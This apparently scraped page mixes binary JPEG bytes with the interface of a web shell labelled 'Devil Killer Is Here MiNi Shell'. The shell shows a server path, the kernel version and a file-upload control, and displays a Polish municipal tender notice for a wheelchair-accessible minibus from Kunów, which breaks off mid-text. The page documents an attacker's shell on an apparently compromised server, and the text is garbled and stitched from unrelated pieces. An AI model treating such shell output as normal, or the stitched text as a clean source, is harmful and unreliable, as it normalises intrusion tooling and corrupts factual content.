JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220330/0010383301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa jednego mikrobusa przystosowanego do przewozu osób niepełnosprawnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kunów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009805</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska 45B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kunów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-415</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 412613174</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 412613194</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kunow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kunow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa jednego mikrobusa przystosowanego do przewozu osób niepełnosprawnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5054d22-b01a-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00103833</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00015282/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa jednego mikrobusa przystosowanego do przewozu osób niepełnosprawnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zam., a Wykonawcami odbywa się drogą elekt. przy użyciu miniPortalu, który dostępny jest pod<br/>adresem:https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal. Komunikacja w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta Wykonawcy) odbywa się elekt. za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Form. do komunikacji) lub za pomocą poczty elekt. W korespondencji zw. z postępowaniem Zam. i Wykonawcy posługują<br/>się numerem ogłoszenia (BZP). W przypadku korespondencji przesyłanej za pomocą poczty elekt. uczestnicy postępowania mogą posługiwać się identyfikatorem (ZP.I.271.11.2022). Zam. może również komunikować się z Wykonawcami za pomocą poczty elekt. Zam. dopuszcza również możliwość składania dokumentów elekt., oświadczeń lub elekt. kopii dokumentów lub oświadczeń za<br/>pomocą poczty elekt., na adres e-mail: przetargi@kunow.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania techniczne<br/>i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP. Wykonawca przystępując do niniejszego postępowania o<br/>udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz<br/>zobowiązuje się korzystając z miniPortalu<br/>przestrzegać postanowień tego regulaminu. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy<br/>do: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>komunikacji wynosi 150 MB. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. Do złożenia<br/>oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy aktualnego podpisu zaufanego lub<br/>podpisu osobistego. UWAGA: Podpisy: zaufany i osobisty nie są zapewniane przez system.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych (dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych osobowych przetwarzanych jest Burmistrz Miasta i Gminy w Kunowie<br/>działający w imieniu Urzędu Miasta i Gminy w Kunowie, z siedzibą przy ul. Warszawskiej 45B, 27-415 Kunów. Z administratorem<br/>można się skontaktować w następujący sposób: listownie na adres siedziby administratora, e-mailem:<br/>urzad@kunow.pl, telefonicznie: (41) 261-31-74, ePUAPem: adres skrzynki ePUAP: /4f25l3kcff/SkrytkaESP;2) administrator<br/>wyznaczył Inspektora Danych Osobowych, z którym można się<br/>kontaktować pod adresem e-mail: iod@kunow.pl;3)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji;4)odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 74 ustawy p.z.p;5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p.<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6)obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;7)w odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. 8)posiada<br/>Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu<br/>albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia); b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników); c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); d) prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu: a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;10)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.I.271.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 146341,46 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem niniejszego zamówienia jest zakup oraz dostawa do siedziby Zamawiającego 1 sztuki mikrobusa 9-cio<br/>osobowego (8 miejsc + kierowca) przystosowanego do przewozu osób<br/>niepełnosprawnych, w tym także poruszających się na wózkach inwalidzkich (możliwość zamocowania 1 miejsca do<br/>kotwiczenia wózków inwalidzkich) w ramach realizacji projektu pn.:<br/>„Program wyrównywania różnic między regionami III”, współfinansowanego ze środków PFRON (Państwowy Fundusz<br/>Rehabilitacji Osób Niepełnosprawnych). Zamawiający oczekuje<br/>terminowej realizacji zamówienia. W przypadku utraty dofinansowania z winy Wykonawcy (np. niezrealizowanie w terminie,<br/>niezgodność z ofertą) Wykonawca zapłaci Zamawiającemu kary umowne na zasadach określonych we wzorze umowy<br/>(załącznik Nr 5 do Specyfikacji Warunków<br/>Zamówienia). 3.Mikrobus musi być fabrycznie nowy, kompletny, wolny od wad materiałowych, konstrukcyjnych,<br/>wykonawczych i prawnych, wyprodukowany w 2021 roku. Samochód może<br/>pochodzić z ekspozycji w punktach sprzedaży, nie może mieć przebiegu większego niż 100 km. Samochód musi spełniać<br/>wymogi obowiązujących przepisów unijnych w zakresie emisji spalin<br/>(wymagane EURO VI) oraz posiadać homologację wystawioną zgodnie z art. 70b ustawy z dnia 20 czerwca 1997 roku -<br/>Prawo o ruchu drogowym (Dz.U. z 2021 roku poz. 450). Mikrobus musi<br/>mieć kierownicę usytuowaną po lewej stronie pojazdu, musi być przystosowany do przewozu osób w ruchu prawostronnym.<br/>Mikrobus ma spełniać wszystkie wymagania określone w<br/>obowiązujących przepisach prawnych, w tym określone w dziale III ustawy z dnia 20 czerwca 1997 roku - Prawo o ruchu<br/>drogowym (Dz. U. z 2021 roku poz. 450) oraz przepisach wykonawczych do tej ustawy. 4.Mikrobus musi posiadać wszelkie<br/>niezbędne wymagane<br/>przepisami homologacje i dopuszczenia do ruchu lub badania techniczne (dotyczy również dostosowania dla osób<br/>niepełnosprawnych). 5.Mikrobus przystosowany do przewozu osób niepełnosprawnych powinien być wyposażony w system<br/>szybkiego demontażu foteli pasażerskich, w celu stworzenia jednego stanowiska w mikrobusie do przewozu osób na wózku<br/>inwalidzkim plus atestowane mocowania na wózek inwalidzki, oraz homologowany komplet pasów bezpieczeństwa dla<br/>niepełnosprawnych na wózku inwalidzkim + szyny do transportu<br/>osób na wózkach – najazd tylny (w celu spełnienia przez przedmiot zamówienia wymogów z art. 4 ust. 3 ustawy z dnia 19<br/>lipca 2019 roku o zapewnianiu dostępności osobom ze szczególnymi<br/>potrzebami (Dz. U. z 2020 roku poz. 1062). 6.Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 6 do<br/>Specyfikacji Warunków Zamówienia – „Opis przedmiotu<br/>zamówienia” (Specyfikacja funkcjonalno - techniczna). Szczegółowe warunki realizacji zamówienia określa „wzór umowy” -<br/>załącznik Nr 5 do Specyfikacji Warunków Zamówienia.<br/>7.Dostarczony samochód winien posiadać komplet dokumentów niezbędnych do zarejestrowania zgodnie z przepisami<br/>obowiązującymi na terenie Rzeczpospolitej Polskiej, na<br/>zasadach dopuszczenia do ruchu oraz wyciąg ze świadectwa homologacji, 2 komplety instrukcji obsługi i konserwacji<br/>pojazdu w języku polskim, książkę gwarancyjną pojazdu i umowę<br/>gwarancyjną. 8.Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie -<br/>należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ<br/>i dopuszcza składanie ofert „równoważnych” o parametrach techniczno-eksploatacyjno-użytkowych nie gorszych niż te<br/>podane w opisie przedmiotu zamówienia (oferty równoważne nie<br/>mogą być gorsze pod względem posiadanych parametrów jakościowych, ilościowych oraz spełniać minimum te same<br/>funkcje). Wykonawca, który powołuje się na równoważne rozwiązania, jest zobowiązany wykazać, że oferowana przez niego<br/>dostawa spełnia wymagania określone przez Zamawiającego. 9.Przedmiot zamówienia należy dostarczyć do siedziby<br/>Zamawiającego: Urząd Miasta i Gminy w Kunowie, ul. Warszawska 45B, 27-415 Kunów.<br/>10.Warunki ogólne wykonania zamówienia: 1)przedmiot zamówienia musi być zrealizowany w sposób kompletny i<br/>całościowy ze względu na cele zamówienia i swoje przeznaczenie oraz charakter; 2)przedmiot zamówienia musi pochodzić<br/>z legalnego kanału dystrybucji zgodnie z wymaganiami producentów; 3)Wykonawca zobowiązuje się do wykonania<br/>przedmiotu zamówienia z należytą starannością, zgodnie z obowiązującymi normami i przepisami prawa, zasadami<br/>współczesnej wiedzy technicznej. 11.Warunki dotyczące serwisu gwarancyjnego: 1)Oferowany przedmiot zamówienia musi<br/>być objęty gwarancją. Okres gwarancji będzie liczony od<br/>daty rejestracji pojazdu. 2) Wykonawca gwarantuje dostęp do stacji serwisowej obsługi pojazdów, znajdującej się w<br/>odległości do 100 km od siedziby Zamawiającego wskazanej w punkcie 9, która zapewni obsługę serwisową pojazdu bez<br/>utraty gwarancji. 3)Szczegółowe warunki dotyczące serwisu gwarancyjnego zostały określone we wzorze umowy.<br/>12.Mikrobus zostanie objęty gwarancją zgodnie z warunkami Specyfikacji Warunków Zamówienia i ofertą Wykonawcy:<br/>• gwarancja na podzespoły mechaniczne, elektryczne i elektroniczne pojazdu minimum 24 miesiące, przy założeniu, że<br/>roczny przebieg pojazdu nie przekroczy 50.000 km, jednak nie<br/>krócej niż okres gwarancji określony przez producenta mikrobusa,<br/>• gwarancja na powłokę lakierniczą minimum 24 miesiące, bez limitu kilometrów, jednak nie krócej niż okres gwarancji<br/>określony przez producenta mikrobusa,<br/>• gwarancja na perforację korozyjną nadwozia minimum 72 miesiące, bez limitu kilometrów,<br/>• gwarancja na zabudowę minimum 24 miesiące, bez limitu kilometrów.<br/>13. Zamawiający nie dopuszcza składania ofert częściowych.<br/>14. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych. 15. Zamawiający<br/>nie przewiduje udzielania zamówień, o których mowa w art.<br/>214 ust. 1 punkt 7 i 8 ustawy Prawo zamówień publicznych. 16.Szczegółowy opis oraz sposób realizacji zamówienia<br/>zawiera Opis Przedmiotu Zamówienia (OPZ), stanowiący załącznik Nr 6 do Specyfikacji Warunków Zamówienia.<br/>17.Stosownie do treści art. 100 ust. 1 ustawy Prawo zamówień publicznych Zamawiający wymaga aby realizacja<br/>zamówienia dostosowana była do<br/>potrzeb wszystkich użytkowników, w tym dla osób niepełnosprawnych, w tym zakresie wymogi zostały określone w ust. 5 tego rozdziału. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34120000-4 - Pojazdy silnikowe do transportu 10 lub więcej osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34100000-8 - Pojazdy silnikowe</p> <p class="mb-0">34114000-9 - Pojazdy specjalne</p> <p class="mb-0">34121000-1 - Autobusy i autokary</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert: Cena brutto (C) - waga kryterium 60 % oraz Gwarancja (G) - waga kryterium 40 %. Opis kryteriów oceny ofert wraz z<br/>podaniem wag kryteriów i sposobu oceny ofert zawarty jest w rozdz. XIX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>- wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem<br/>dowodów<br/>określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń 